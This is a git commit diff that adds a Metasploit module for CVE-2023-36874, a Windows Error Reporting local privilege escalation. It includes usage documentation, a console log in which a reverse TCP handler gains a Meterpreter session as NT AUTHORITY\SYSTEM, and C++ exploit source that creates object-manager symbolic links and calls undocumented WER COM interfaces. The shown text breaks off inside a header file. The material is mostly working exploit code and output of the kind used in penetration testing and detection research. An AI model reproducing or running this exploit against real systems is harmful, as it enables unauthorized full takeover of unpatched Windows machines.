Land #18314, Windows Error Reporting RCE (CVE-2023-36874)
This commit is contained in:
commit
1058291af9
7
LICENSE
7
LICENSE
|
@ -85,6 +85,13 @@ Files: exteneral/source/exploits/CVE-2022-26904/*
|
|||
Copyright: 2022 Abdelhamid Naceri
|
||||
License: MIT
|
||||
|
||||
Files: external/source/exploits/CVE-2023-36874/*
|
||||
Copyright: 2023 Octoberfest7
|
||||
License: MIT
|
||||
Purpose: Library and error report file are required for calculating offsets to the correct
|
||||
function calls to implement the exploit. The heavily modified C main is necessary
|
||||
to create and trigger the exploit.
|
||||
|
||||
Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
|
||||
Copyright: 2011 Jon Bringhurst
|
||||
License: GNU GPL 2.0
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -0,0 +1,113 @@
|
|||
## Vulnerable Application
|
||||
This module works only on Windows 10x64 22H2
|
||||
|
||||
### Introduction
|
||||
|
||||
This module takes advantage of a bug in the way Windows error reporting opens the report
|
||||
parser. If you open a report, Windows uses a relative path to locate the rendering program.
|
||||
By creating a specific alternate directory structure, we can coerce Windows into opening an
|
||||
arbitrary executable as SYSTEM.
|
||||
If the current user is a local admin, the system will attempt impersonation and the exploit will
|
||||
fail. Because the payload is added to a directory this module creates, in the event of successful
|
||||
exploitation, the user will need to delete the payload and the directories containing the payload
|
||||
manually.
|
||||
|
||||
This module will attempt to delete the payload it uploads and the directory structure.
|
||||
|
||||
## Installation Instructions
|
||||
1. Install Windows 10x64 22H2
|
||||
1. Create a standard user
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Create a session on the target system under the context of a non local administrative user.
|
||||
1. Begin interacting with the module: `use exploit/windows/local/win_error_cve_2023_36874`.
|
||||
1. Set the `PAYLOAD` and configure it correctly.
|
||||
1. If an existing handler is configured to receive the elevated session, then the module's
|
||||
handler should be disabled: `set DisablePayloadHandler true`.
|
||||
1. Make sure that the `SESSION` value is set to the existing session identifier.
|
||||
1. Invoke the module: `run`.
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
### EXPLOIT_NAME
|
||||
|
||||
The filename to use for the exploit binary (%RAND%.exe by default)
|
||||
|
||||
### REPORT_DIR
|
||||
|
||||
The Error Directory to use (%RAND% by default).
|
||||
|
||||
### REPORT_NAME
|
||||
|
||||
The Error report name (%RAND% by default).
|
||||
|
||||
### SHADOW_DRIVE
|
||||
|
||||
Directory to place in the home drive for pivot (%TEMP% by default).
|
||||
|
||||
### EXECUTE_DELAY
|
||||
|
||||
The number of seconds to delay between file upload and exploit launch. Default is 3.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 10.0.19045.2006 x64 (Windows 10x64 22H2)
|
||||
|
||||
```
|
||||
msf6 exploit(windows/local/win_error_cve_2023_36874) > run
|
||||
|
||||
[*] Started reverse TCP handler on 10.5.135.201:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[*] OS version: Windows 10+ Build 19045
|
||||
[+] The target appears to be vulnerable.
|
||||
[*] Shadow Path = C:\NpIWBsCJozK
|
||||
[*] Attempting to PrivEsc on DESKTOP-V413087 via session ID: 1
|
||||
[*] C:\ProgramData
|
||||
[*] Creating C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
|
||||
[*] Creating directory C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
|
||||
[*] C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
|
||||
[*] Writing Report to C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
|
||||
[*] Creating directory C:\NpIWBsCJozK
|
||||
[*] C:\NpIWBsCJozK created
|
||||
[*] Creating directory C:\NpIWBsCJozK\ProgramData\
|
||||
[*] C:\NpIWBsCJozK\ProgramData\ created
|
||||
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\
|
||||
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\ created
|
||||
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\
|
||||
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\ created
|
||||
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\
|
||||
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ created
|
||||
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
|
||||
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\ created
|
||||
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
|
||||
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
|
||||
[*] Writing bad Report to C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
|
||||
[*] Creating C:\NpIWBsCJozK\system32
|
||||
[*] Creating directory C:\NpIWBsCJozK\system32
|
||||
[*] C:\NpIWBsCJozK\system32 created
|
||||
[*] Writing payload to C:\NpIWBsCJozK\system32\wermgr.exe
|
||||
[*] shadow_path = NpIWBsCJozK
|
||||
[*] Exploit uploaded on DESKTOP-V413087 to C:\NpIWBsCJozK\fShpLfYh.exe
|
||||
[*] Sending stage (200774 bytes) to 10.5.132.118
|
||||
[+] Deleted C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
|
||||
[*]
|
||||
[+] Deleted C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
|
||||
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:62415) at 2023-09-19 15:43:02 -0500
|
||||
[-] Failed to delete C:\NpIWBsCJozK\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : DESKTOP-V413087
|
||||
OS : Windows 10 (10.0 Build 19045).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : WORKGROUP
|
||||
Logged On Users : 4
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
meterpreter > exit
|
||||
|
||||
```
|
31
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln
vendored
Executable file
31
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.sln
vendored
Executable file
|
@ -0,0 +1,31 @@
|
|||
|
||||
Microsoft Visual Studio Solution File, Format Version 12.00
|
||||
# Visual Studio Version 16
|
||||
VisualStudioVersion = 16.0.32929.386
|
||||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2023-36874", "CVE-2023-36874\CVE-2023-36874.vcxproj", "{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
Debug|x86 = Debug|x86
|
||||
Release|x64 = Release|x64
|
||||
Release|x86 = Release|x86
|
||||
EndGlobalSection
|
||||
GlobalSection(ProjectConfigurationPlatforms) = postSolution
|
||||
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x64.Build.0 = Debug|x64
|
||||
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Debug|x86.Build.0 = Debug|Win32
|
||||
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.ActiveCfg = Release|x64
|
||||
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x64.Build.0 = Release|x64
|
||||
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.ActiveCfg = Release|Win32
|
||||
{4CBF3ACA-76E5-4C6A-9483-CA2ADC6EAF6B}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
EndGlobalSection
|
||||
GlobalSection(ExtensibilityGlobals) = postSolution
|
||||
SolutionGuid = {A022017A-2A80-4E35-A696-EB6884E52E5E}
|
||||
EndGlobalSection
|
||||
EndGlobal
|
152
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj
vendored
Executable file
152
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj
vendored
Executable file
|
@ -0,0 +1,152 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{4cbf3aca-76e5-4c6a-9483-ca2adc6eaf6b}</ProjectGuid>
|
||||
<RootNamespace>CVE202336874</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v142</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<LinkIncremental>true</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<LinkIncremental>false</LinkIncremental>
|
||||
</PropertyGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="cve_2023_36874.cpp" />
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="def.h" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
27
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters
vendored
Executable file
27
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874.vcxproj.filters
vendored
Executable file
|
@ -0,0 +1,27 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="cve_2023_36874.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="def.h">
|
||||
<Filter>Header Files</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
</Project>
|
131
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp
vendored
Executable file
131
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/cve_2023_36874.cpp
vendored
Executable file
|
@ -0,0 +1,131 @@
|
|||
#include "def.h"
|
||||
|
||||
int wmain(int argc, wchar_t** argv)
|
||||
|
||||
{
|
||||
IWerReport* pIWerReport = NULL;
|
||||
IErcLuaSupport* pIErcLuaSupport = NULL;
|
||||
IWerStoreFactory* pIWerStoreFactory = NULL;
|
||||
IWerStore* pIWerStore = NULL;
|
||||
IWerReportSubmitCallback* pIWerSubmitCallback = NULL;
|
||||
HRESULT result = 0;
|
||||
HMODULE hm = GetModuleHandle(NULL);
|
||||
UNICODE_STRING symlink_name;
|
||||
UNICODE_STRING path;
|
||||
UNICODE_STRING object;
|
||||
OBJECT_ATTRIBUTES objAttrLink, objAttrDir;
|
||||
HANDLE hSymlink, hObjectdir, hSymlinkWindows, hSymlinkProgramdata;
|
||||
HMODULE ntdll = LoadLibraryW(L"ntdll.dll");
|
||||
WCHAR ntdcoDir[128] = { 0 };
|
||||
WCHAR ntdcoDir_1[128] = { 0 };
|
||||
pNtCreateSymbolicLinkObject = (_NtCreateSymbolicLinkObject)GetProcAddress(ntdll, "NtCreateSymbolicLinkObject");
|
||||
pRtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(ntdll, "RtlInitUnicodeString");
|
||||
pNtCreateDirectoryObject = (_NtCreateDirectoryObject)GetProcAddress(ntdll, "NtCreateDirectoryObject");
|
||||
|
||||
result = CoInitialize(NULL);
|
||||
|
||||
BSTR data = SysAllocString(argv[1]);
|
||||
//BSTR report = SysAllocString(L"testing");
|
||||
BSTR report = SysAllocString(argv[3]);
|
||||
|
||||
if (FAILED(result))
|
||||
{
|
||||
printf("Error: CoInitialize 0x%x\n", result);
|
||||
return -1;
|
||||
}
|
||||
|
||||
result = CoInitializeSecurity(NULL, -1, NULL, NULL, RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE, NULL);
|
||||
|
||||
if (FAILED(result))
|
||||
{
|
||||
printf("Error: CoInitializeSecurity 0x%x\n", result);
|
||||
return -1;
|
||||
}
|
||||
result = CoCreateInstance(__uuidof(CLSID_IErcLuaSupport), NULL, CLSCTX_LOCAL_SERVER, __uuidof(IErcLuaSupport), (PVOID*)&pIErcLuaSupport);
|
||||
if (FAILED(result))
|
||||
{
|
||||
printf("Error CoCreateInstance: 0x%x\n", result);
|
||||
return -1;
|
||||
}
|
||||
|
||||
result = pIErcLuaSupport->Proc3(&pIWerStoreFactory);
|
||||
if (FAILED(result))
|
||||
{
|
||||
printf("Error pIErcLuaSupport: 0x%x\n", result);
|
||||
return -1;
|
||||
}
|
||||
|
||||
result = pIWerStoreFactory->Proc4(&pIWerStore);
|
||||
if (FAILED(result))
|
||||
{
|
||||
printf("Error pIWerStoreFactory: 0x%x\n", result);
|
||||
return -1;
|
||||
}
|
||||
|
||||
result = pIWerStore->Proc3();
|
||||
if (FAILED(result))
|
||||
{
|
||||
printf("Error pIWerStore(Proc3) : 0x%x\n", result);
|
||||
return -1;
|
||||
}
|
||||
|
||||
result = pIWerStore->Proc6(report, &pIWerReport);
|
||||
if (FAILED(result))
|
||||
{
|
||||
printf("Error pIWerStore(Proc6): 0x%x\n", result);
|
||||
return -1;
|
||||
}
|
||||
int64_t ret = 0;
|
||||
|
||||
ZeroMemory(ntdcoDir, 128);
|
||||
swprintf_s(ntdcoDir, 128, L"\\??\\%ls", argv[1]);
|
||||
pRtlInitUnicodeString(&object, ntdcoDir);
|
||||
|
||||
InitializeObjectAttributes(&objAttrDir, &object, OBJ_CASE_INSENSITIVE, NULL, NULL);
|
||||
pNtCreateDirectoryObject(&hObjectdir, 0xF000F, &objAttrDir);
|
||||
|
||||
pRtlInitUnicodeString(&symlink_name, L"Windows");
|
||||
ZeroMemory(ntdcoDir, 128);
|
||||
swprintf_s(ntdcoDir, 128, L"\\GLOBAL??\\%ls\\%ls", argv[2], argv[1]);
|
||||
pRtlInitUnicodeString(&path, ntdcoDir);
|
||||
|
||||
InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL);
|
||||
pNtCreateSymbolicLinkObject(&hSymlinkWindows, 0xF0001, &objAttrLink, &path);
|
||||
|
||||
ZeroMemory(&objAttrLink, sizeof(objAttrLink));
|
||||
ZeroMemory(&symlink_name, sizeof(symlink_name));
|
||||
ZeroMemory(&path, sizeof(UNICODE_STRING));
|
||||
|
||||
pRtlInitUnicodeString(&symlink_name, L"ProgramData");
|
||||
ZeroMemory(ntdcoDir, 128);
|
||||
swprintf_s(ntdcoDir, 128, L"\\GLOBAL??\\%ls\\Programdata", argv[2]);
|
||||
pRtlInitUnicodeString(&path, ntdcoDir);
|
||||
InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, hObjectdir, NULL);
|
||||
pNtCreateSymbolicLinkObject(&hSymlinkProgramdata, 0xF0001, &objAttrLink, &path);
|
||||
|
||||
ZeroMemory(&objAttrLink, sizeof(objAttrLink));
|
||||
ZeroMemory(&symlink_name, sizeof(symlink_name));
|
||||
ZeroMemory(&path, sizeof(UNICODE_STRING));
|
||||
|
||||
ZeroMemory(ntdcoDir, 128);
|
||||
swprintf_s(ntdcoDir, 128, L"\\??\\%ls", argv[2]);
|
||||
pRtlInitUnicodeString(&symlink_name, ntdcoDir);
|
||||
|
||||
ZeroMemory(ntdcoDir_1, 128);
|
||||
swprintf_s(ntdcoDir_1, 128, L"\\??\\%ls", argv[1]);
|
||||
pRtlInitUnicodeString(&path, ntdcoDir_1);
|
||||
|
||||
InitializeObjectAttributes(&objAttrLink, &symlink_name, OBJ_CASE_INSENSITIVE, NULL, NULL);
|
||||
pNtCreateSymbolicLinkObject(&hSymlink, 0xF0001, &objAttrLink, &path);
|
||||
result = pIWerReport->Proc24(report, 1024, NULL, &data, &ret);
|
||||
if (FAILED(result))
|
||||
{
|
||||
printf("Error pIWerReport: 0x%x\n", result);
|
||||
return -1;
|
||||
}
|
||||
Sleep(2000);
|
||||
CloseHandle(hSymlink);
|
||||
CloseHandle(hObjectdir);
|
||||
CloseHandle(hSymlinkProgramdata);
|
||||
CloseHandle(hSymlinkWindows);
|
||||
}
|
94
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h
vendored
Executable file
94
external/source/exploits/CVE-2023-36874/CVE-2023-36874/CVE-2023-36874/def.h
vendored
Executable file
|
@ -0,0 +1,94 @@
|
|||
#include <windows.h>
|
||||
#include <stdio.h>
|
||||
#include <winternl.h>
|
||||
#include <stdint.h>
|
||||
|
||||
|
||||
|
||||
struct __declspec(uuid("0e9a7bb5-f699-4d66-8a47-b919f5b6a1db")) CLSID_IErcLuaSupport;
|
||||
|
||||
class __declspec(uuid("a7a3dd4c-defc-46a2-832e-5a743be69e8c")) IWerReportSubmitCallback : public IUnknown {
|
||||
public:
|
||||
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t p0);
|
||||
virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ int64_t p1);
|
||||
};
|
||||
|
||||
|
||||
|
||||
class __declspec(uuid("fe6f6e62-fe82-4f7f-947a-7f37b44594ca")) IWerKeyValueList : public IUnknown {
|
||||
public:
|
||||
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1, /* Stack Offset: 24 */ BSTR* p2);
|
||||
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
|
||||
};
|
||||
|
||||
|
||||
|
||||
class __declspec(uuid("6764c32a-97a5-44ec-9bc0-77368c7746b2")) IWerStringList : public IUnknown {
|
||||
public:
|
||||
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ BSTR* p1);
|
||||
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
|
||||
};
|
||||
|
||||
|
||||
class __declspec(uuid("d01b8f28-0bd1-4652-a415-8229f5ee506c")) IWerReport : public IUnknown {
|
||||
public:
|
||||
virtual HRESULT __stdcall Proc3(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc4(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc5(/* Stack Offset: 8 */ BSTR* p0);
|
||||
virtual HRESULT __stdcall Proc6(/* Stack Offset: 8 */ IWerKeyValueList** p0);
|
||||
virtual HRESULT __stdcall Proc7(/* Stack Offset: 8 */ IWerKeyValueList** p0);
|
||||
virtual HRESULT __stdcall Proc8(/* Stack Offset: 8 */ IWerStringList** p0);
|
||||
virtual HRESULT __stdcall Proc9(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc10(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc11(/* Stack Offset: 8 */ BSTR* p0);
|
||||
virtual HRESULT __stdcall Proc12(/* Stack Offset: 8 */ BSTR* p0);
|
||||
virtual HRESULT __stdcall Proc13(/* Stack Offset: 8 */ IWerStringList** p0);
|
||||
virtual HRESULT __stdcall Proc14(/* Stack Offset: 8 */ IWerStringList** p0);
|
||||
virtual HRESULT __stdcall Proc15(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc16(/* Stack Offset: 8 */ struct Struct_1* p0);
|
||||
virtual HRESULT __stdcall Proc17(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc18(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc19(/* Stack Offset: 8 */ int64_t* p0);
|
||||
virtual HRESULT __stdcall Proc20(/* Stack Offset: 8 */ BSTR p0, /* Stack Offset: 16 */ BSTR* p1);
|
||||
virtual HRESULT __stdcall Proc21(/* Stack Offset: 8 */ BSTR* p0);
|
||||
virtual HRESULT __stdcall Proc22(/* Stack Offset: 8 */ int64_t p0, /* Stack Offset: 16 */ int64_t* p1, /* Stack Offset: 24 */ int64_t* p2, /* Stack Offset: 32 */ BSTR* p3, /* Stack Offset: 40 */ BSTR* p4);
|
||||
